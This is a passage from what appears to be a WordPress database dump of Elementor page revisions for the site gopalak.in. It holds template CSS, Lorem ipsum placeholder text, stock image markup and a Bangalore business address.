.elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:39:49','2022-09-30 06:09:49','',1373,'https://gopalak.in/?p=1469',0,'revision','',0),(1470,1,'2022-09-30 11:39:49','2022-09-30 06:09:49','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #2\n									</li>\n								<li>\n										List Item #3\n									</li>\n								<li>\n										List Item\n									</li>\n						</ul>\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:39:49','2022-09-30 06:09:49','',1373,'https://gopalak.in/?p=1470',0,'revision','',0),(1471,1,'2022-09-30 11:43:26','2022-09-30 06:13:26','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #2\n									</li>\n								<li>\n										List Item #3\n									</li>\n								<li>\n										List Item\n									</li>\n						</ul>\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:43:26','2022-09-30 06:13:26','',1373,'https://gopalak.in/?p=1471',0,'revision','',0),(1472,1,'2022-09-30 11:43:26','2022-09-30 06:13:26','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										List Item #1\n									</li>\n								<li>\n										List Item #2\n									</li>\n								<li>\n										List Item #3\n									</li>\n								<li>\n										List Item\n									</li>\n						</ul>\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:43:26','2022-09-30 06:13:26','',1373,'https://gopalak.in/?p=1472',0,'revision','',0),(1473,1,'2022-09-30 11:43:26','2022-09-30 06:13:26','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading 